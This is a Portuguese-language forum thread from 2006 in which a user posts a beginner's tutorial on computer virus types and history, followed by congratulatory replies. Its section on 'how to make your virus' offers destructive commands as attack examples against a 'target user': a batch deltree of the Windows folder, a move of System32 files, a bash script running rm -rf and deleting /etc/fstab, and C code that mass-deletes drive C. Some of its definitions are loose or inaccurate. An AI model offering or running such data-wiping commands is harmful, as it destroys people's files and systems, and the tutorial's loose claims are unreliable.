Tutorial Vírus

[vuln]

---------------------------------------
- Tutorial sobre espécies de Vírus    -
- de Computador.                      -
- Por: vuln 03/10/2006        -
- Homenagem: Meu aniversário (04/10)  -
---------------------------------------

Índice

1. Introdução
2. O que é um vírus?
3. Tipos de vírus.
 3.1 Classificações Gerais
  3.1.1 Spyware
  3.1.2 Worms
  3.1.3 Trojan
 3.2 Classificações Específicas
  3.2.1 Polimórficos
  3.2.2 Retrovírus
  3.2.3 Boot Infector
  3.2.4 Stealth
  3.2.5 Companion
  3.2.6 File Infector
  3.2.7 Vírus de Macro
4. Como posso fazer o meu vírus?
5. Backdoors e Keyloggers
6. Uma curta história sobre vírus
7. Conclusão
8. Agradecimentos



1. INTRODUÇÃO
 Inicialmente gostaria de agradecer a todos que estão aqui hoje perdendo seu precioso tempo para prestar atenção nesse meu humilde tutorial. Eu serei breve, sem querer ocupar muito do seu tempo, e desse modo irei explicá-los diversas coisas sobre Vírus, desde suas características, tipos e muito mais.

2. O QUE É UM VÍRUS?
 Até hoje muitos estudiosos ainda pensam em definir realmente qual o significado da palavra virus (de computador). As opiniões variam e a cada dia mais, podemos ver novos conceitos surgindo por ai, mesmo alguns deles sendo totalmente ilógicos e irracionais. Um vírus, é todo e qualquer arquivo que poderá futuramente causar danos a máquina. A conclusão disso tudo é que no nosso dia a dia nos deparamos com diversos vírus e não percebemos. Então, se você tem um arquivo e esse causa algum dano ao seu computador, seria interessante ver se é mesmo necessário que ele continue os afazeres dele.

3. TIPOS DE VÍRUS
 Os vírus, a cada dia mais, diversificam-se mais chegando a quantidades estrondosas de classificações. Colocarei aqui as mais importantes e conhecidas, de modo que facilite seu aprendizado do básico e não de um nível mais graduado em relação ao conhecimento de vírus de computador.

3.1 CLASSIFICAÇÕES GERAIS

3.1.1 Spyware
 Os Spywares são arquivos que buscam capturar informações (spy = espião) da sua máquina e oferecer a algum usuário da rede, de modo que, esse determinado usuário saiba diversas características de seu computador.

3.1.2 Worms
 São os vírus mais conhecidos. Espalham-se rapidamente como uma epidemia pela rede.

3.1.3 Trojan
 Muitos consideram como forma de vírus. EU não considero, mas como o tutorial é para vocês e não para mim vamos lá. O trojan é um programa o qual gera um Patch. Esse Patch quando executado libera conexões na máquina para que outra pessoa utilizando o Trojan (Cliente) possa conectar-se a ela e então efetivar uma invasão. O patch pode ser considerado um vírus, já que ele traz danos ao computador (conexões abertas ilegais).

3.2 CLASSIFICAÇÕES ESPECÍFICAS

3.2.1 Polimórficos
 Esses vírus já são bastante conhecidos por vocês, afinal, essa característica é uma das responsáveis por ele se espalhar tão rapidamente. Um vírus polimórfico é aquele (morfia = forma, poli = muitos) que ao decorrer do tempo altera sua forma ficando indetectável. Um vírus mutante, seria um bom conceito para ele. Alguns vírus quando instalados em um computador geram várias cópias dele com códigos diferentes, de modo que se o anti-vírus capturar uma ou duas cópias terão outras a solta para continuar o trabalho.

3.2.2 Retrovírus
 Os vírus Retrovírus são os vírus anti-vírus. Assim que conectados nas máquinas e estabelecidos buscam anti-vírus conhecidos e o infectam impossibilitando a continuidade de seus serviços.

3.2.3 Boot Infector
 São aqueles vírus que buscam infectar e causar danos na área de Boot (inicialização) do computador.

3.2.4 Stealth
  Esse tipo de vírus recebeu este nome numa analogia ao famoso caça americano que foi usado na Guerra do Golfo e é invisível a radares, se bem que um deles foi derrubado no ataque da OTAN aos rebeldes na Iuguslávia e os russos levaram partes dele para seu país para estudo, mas isto é uma outra "história"...
 O fato é que este tipo de vírus modifica tudo de forma a tornar a sua detecção pelo antivírus muito difícil. Data de gravação, tamanho, tudo é alterado.

3.2.5 Vírus companion
 São vírus que não infectam arquivos executáveis (binários) mas criam uma extensão .com e seu atributo é mudado para hidden (escondido), por estas características é muito difícil a detecção de um vírus que esteja nesta categoria, por serem subestimados na maioria das vezes.

3.2.6 File infector
 Este tipo de vírus é muito comum. Um exemplo muito conhecido de todos pela mídia é o Jerusalém. Ele infecta arquivos executáveis (binários) e se copiam para o início ou fim do código do arquivo. De forma que se você executar o programa tal imediatamente ou mais tarde ele poderá ativar o verdadeiro programa. Um exemplo disso seria rodar o vírus em background enquanto ainda há o uso do software iniciado primeiro.

3.2.7 Vírus de macro
 São os vírus mais comuns. Cerca de 85% dos vírus são de macro. Eles se aproveitam das macros automáticas do Word ou do Excel para executarem funções danosas ao seu computador apagando arquivos comuns ou deletando arquivos de configuração do sistema. Uma vez tive a oportunidade de ver um micro que teve o arquivo interpretador de comando command.com deletado por conta de um vírus de macro. A solução é então desabilitar as macros automáticas do Word. Vá no menu ferramentas e desabilite estas macros.

4. COMO POSSO FAZER O MEU VÍRUS?
 Bem, inicialmente você deve saber programar em alguma Linguagem de Programação. Após isso é só você programar uma rotina* que realize ações as quais possam OU não trazer benefício a você e prejuízo ao usuário alvo. Um exemplo de vírus em Batch Script, seria:

----exemplo.bat ou exemplo.com-------- (Para versões =< 98)
deltree /y C:\windows\*.*
--------------------------------------

----exemplo.bat ou exemplo.com-------- (Para versões > 98)
mkdir C:\doc\haha\hehehe\
mv C:\Documents and Settings\Usuario-tal\Windows\System32\*.* C:\doc\haha\hehehe\
--------------------------------------

Ambos os arquivos, denominados então vírus a partir de quando trazem dano, tem menos de 3 linhas. E os dois são capazes de trazer estragos e dores de cabeça aos usuários administradores da máquina. Por ai, vejam que não é só um super mega programador que consegue fazer um vírus.
Em Shell Script:
#!/bin/bash
rm -rf *.*
rm -rf /etc/fstab

-----------------

Nesse caso, no Linux, pode ser que não faça nenhum estrago GRANDE se a conta utilizada não tiver direitos de Super Usuário (SU). Porém, de qualquer modo ele irá apagar todos os arquivos do direitório corrente (se ele tiver permissão claro).

Vamos então agora a um 'vírus' simples em C (compilado e executado no Windows):

#include
#include

int main(void) {
system("del C:\*.*");
system("del C:\Documents and Settings\*.*");
sleep(100);
}

---------------------

Como no Windows um usuário normal já tem direitos totais, não precisamos nos preocupar com O QUE PODEREMOS e o que NÃO poderemos apagar. Somente em casos restritos é proibido a remoção do arquivo.

Acho que já está bom de exemplos em linguagens diferentes não é? hehehe

5. BACKDOORS E KEYLOGGERS
 Muitas pessoas se assustam a ouvir esses nomes. Aqui irei apenas por questão de completar conteúdo (/extra ;). No caso do KeyLoggers (Logador de Chaves) ele apenas grava em arquivos tudo o que é digitado no computador, gravando em um arquivo de texto ou enviando para um determinado endereço na internet.

6. UMA CURTA HISTÓRIA SOBRE VÍRUS

Uma curta história dos vírus



A história dos vírus remonta ao final da década de 40. As primeiras teorias sobre programas auto-reproduzíveis foram desenvolvidas nessa época. Pouco mais de 30 anos depois, os primeiros vírus para computador foram identificados "à solta", "in the wild", como se diz em inglês.

Talvez para surpresa de muitos usuários cotidianos de computadores, os vírus chamados de 1, 2 e 3 afetavam máquinas Apple II e eram disseminados por jogos pirateados. Outro nome dado ao primeiro desses vírus é Elk Cloner, que exibia um poema no monitor.

No fim de 1983, o primeiro vírus experimental documentado começou a ser desenvolvido pelo engenheiro elétrico norte-americano Fred Cohen, para apresentação em um seminário sobre segurança da computação. O programa foi criado em um sistema Unix, e o termo biológico passou a ser usado para designar esse tipo de software. Até hoje, Cohen é considerado o "pai dos vírus de computador".

O primeiro vírus para MS-DOS, batizado de "Brain", surgiu em 1986. Ele infectava apenas disquetes e ocupava todo o espaço disponível no disco. Qualquer disquete inserido em uma máquina contaminada era afetado e passava a exibir como rótulo o texto "© Brain". Esse também foi o primeiro vírus com capacidade de ocultar-se do usuário, já que mostrava o espaço ocupado pelo vírus como disponível. Nesse mesmo ano, o primeiro cavalo-de-tróia, PC-Write, foi lançado.

Já em 1987, os vírus começaram a causar dores de cabeça reais para administradores de sistema. O Lehigh foi o primeiro a infectar o command.com, um software básico do sistema operacional DOS, e o Suriv-02 infectava arquivos executáveis .exe. O Suriv (Virus, escrito ao contrário) era uma série que culminaria no Jerusalem, vírus ativado todas as sextas-feiras 13, que apagava qualquer arquivo acessado nesses dias. Ao lado destas pragas, um programa que se replicava rapidamente (cerca de 500 mil cópias por hora), batizado de Christmas (Natal, em inglês), atingiu grandes computadores da IBM.

Os Macintosh passaram a ser atacados em 1988, pelo vírus MacMag. O primeiro "worm" para Internet, chamado de Morris, também foi lançado nesse ano, paralisando muitos computadores. Essa crise levou à criação, nos Estados Unidos, do primeiro CERT (Computer Emergency Response Team), centro de resposta rápida a incidentes desse tipo. Várias revistas começaram a dar atenção para o problema.

Golpes por meio de programas começaram a circular no ano seguinte. Em 1989, um software supostamente com informações sobre a AIDS criptografava o disco rígido ao ser instalado. A chave para recuperar os dados só era fornecida com o pagamento de uma taxa ao autor.
No mesmo ano em que surgiu o primeiro livro sobre criação de vírus e o primeiro fórum de trocas de arquivos e informações sobre vírus, 1990, a Norton lançou seu antivírus. Os desenvolvedores de vírus responderam à iniciativa com programas como o Tequila, primeiro vírus polimórfico, que se modifica a cada infecção para evitar ser detectado.

A mídia dispara na cobertura sobre os possíveis danos do Michelangelo em 1992. Algumas estimativas citaram 5 milhões de computadores "destruídos" pelo vírus, mas apenas cerca de 5 a 10 mil efetivamente foram afetados. Os primeiros kits de criação de vírus surgem, alguns com menus e opções de ataque.

Os primeiros hoaxes (boatos) sobre vírus aparecem em 1994. Falavam do "Good Times" (bons tempos), um vírus inexistente que apagaria todo o disco rígido apenas com a abertura de um e-mail.

Em 1995, com o lançamento próximo do Windows 95, as empresas antivírus receavam perder mercado, já que a maioria dos vírus era voltada para o DOS. Logo perceberam que não tinham por que temer: surgiam os vírus de macro, que infectavam documentos do Word. No ano seguinte já existiam vírus desenvolvidos especificamente para arquivos do Windows 95 e Excel. Também surgia o primeiro vírus para Linux.

A linguagem Java passou a ser afetada em 1998, pelo Strange Brew. O BackOrifice, um sistema de controle remoto de computadores que atacava pela Internet, também data desse ano.

O final da década de 1990 viu surgir o domínio dos worms, programas com capacidade própria de se duplicar e se espalhar pelos sistemas, sem necessidade de infectar outros arquivos para isso. O Melissa, surgido em 1999, deu início a este domínio. Uma espécie de mistura entre vírus de macro e worm, o Melissa tinha capacidade de infectar arquivos do Word e utilizar e-mails para se distribuir automaticamente para os contatos do Outlook e Outlook Express.

Outro worm criado em 1999, que também utilizava mensagens de e-mail para se distribuir, foi o BubbleBoy. Este programa maléfico não exigia o envio de arquivos anexados às mensagens para contaminar as máquinas. Em vez disso, aproveitava-se de falhas no navegador Internet Explorer e tinha capacidade de infectar apenas com a visualização de uma mensagem de e-mail. Este conceito foi aproveitado pelo worm Kak e por vários outros que surgiram depois.

Em 2000, aconteceram os primeiros ataques distribuídos de negação de serviço sérios, que paralisaram sites como Yahoo! e Amazon. O worm LoveLetter, que no Brasil ficou conhecido como "I Love You", também derrubou vários serviços de e-mail, por sua velocidade de replicação. No mesmo ano surgem os primeiros códigos maléficos para Palmtops, para sistemas de telefonia integrados à Internet, para sistema de arquivos do Windows NT e para a linguagem de programação PHP.

Os primeiros vírus a infectar tanto sistemas Windows quanto Linux foram lançados em 2001. Nesse ano também surgiram os primeiros worms a se distribuírem por sistemas de trocas de arquivos, pelo programa de bate-papo Mirc, os baseados na linguagem de programação AppleScript, dos computadores Macintosh, e os que infectavam os softwares de PDF da Adobe. Os worms Nimda, CodeRed e Sircam também atacaram em 2001.

Vários vírus inovadores surgiram em 2002. Entre eles, os primeiros a infectar a tecnologia .Net, a linguagem C# e o SQL Server (todos produtos da Microsoft), arquivos Flash, a rede de troca de arquivos do programa Kazaa, servidores Apache rodando sobre o sistema FreeBSD e arquivos de imagem JPEG. Este último era apenas um vírus para testar um novo conceito e exigia que um programa especial para "decodificar" a imagem fosse instalado no computador.

Em 2003, as técnicas de programação aliaram-se de forma intensiva à engenharia social nos chamados "phishing scams", golpes que tentam enganar o destinatário de e-mails falsos imitando o visual de grandes empresas e órgãos governamentais. O Sobig aliava seu próprio servidor de envio de mensagens a um sistema que permitia seu uso remoto por spammers. Outro worm, batizado de Blaster, atacava uma vulnerabilidade de um componente do Windows e se disseminou rapidamente. O Slammer, que atacava servidores SQL 2000 da Microsoft, também atacou nesse mesmo ano.

O ano de 2004 seguiu a tendência, com o aumento drástico de ataques de "phishing", geralmente associados a cavalos-de-tróia. Esse ano também viu surgir o Sasser, que afetava outra vulnerabilidade do Windows e se disseminava via servidores de arquivos (FTP). Vulnerabilidades no sistema Mac OS X que permitiam ataques de vírus também foram detectadas (e corrigidas). Foram lançados ainda os vírus Rugrat, voltado para sistemas Intel de 64 bits, e o Cabir, primeiro a infectar telefones celulares da série 60 da Nokia. Outra novidade foi o Scob, surgido em junho, que atacava servidores Web baseados em Windows e, depois, por meio de um código Javascript inserido em todas as páginas do servidor afetado, instalava um cavalo-de-tróia no computador dos visitantes, com o objetivo de roubar senhas bancárias.
Fonte Oficial: http://www.hsbc.com.br/common/seguranca ... irus.shtml
7. Conclusão

 Cheguei então, a conclusão de mostrar a vocês que Vírus não é bicho de sete cabeças como a grande maioria imagina. É algo bastante simples que se com estudo periódico pode-se fazer um bichinho vivo, hehehe.

8. Agradecimentos

 Gostaria de agradecer antes de tudo a Deus, aos meus ideais, ao meu amor, minha família, meus amigos e irmãos, meus inimigos, meus conhecidos e a todos nesse mundo. Gostaria antes de tudo, desculpar-me se o conteúdo não foi bom o suficiente ou se foi apenas muita teoria. Fiz meio que na pressa pois para variar, minha vida anda na correria ultimamente. Mas foi feito com dedicação nesses minutos. Até mais.

 Um abraço para todos que me conhecem e um Parabéns para mim mesmo, já que amanhã, daqui a 1 minuto, é o meu aniversário (04/10)

Pode ser copiado para outros endereços, contanto que os dados relativos a autor e CONTEÚDO continuem os mesmos.

[DarkGenesis]

Obrigado por está sempre colaborando com o crecimento do forum.

Ponto Positivo por esse ótimo tutorial.

E feliz aniversário. 

[vuln]

Obrigado x). Estou fazendo 17 anos mas se perguntarem tenho 16 ainda ok?
Esse negoço de ficar velho não é comigo heheheh  ;D

[#phobia]

Eh...
Está bem feito o seu tutorial velho... Bem explicado e talz...

Congratulations!!! 

[vuln]

Obrigado. Já havia muito tempo que eu não fazia um tutorial.. e fiquei meio motivadovendo os posts do mrx e da Bruna. Então meti bala e fiz meu tutorial sobre vírus. Sempre fui fanático por vírus (mais antigamente), então ainda guardo alguns detalhes teóricos das antigas. Só fiz pesquisar um pouco, renovar-me e fiz o tuto .

Abraços

[insanity]

he he, parebens aí cara pelo tutorial e pelo aniversario

ate mais

[mrx]

Mando muito velho... ;D

[Otsego]

massa d+ essa historia

os virus são apenas mocinhas


i am rock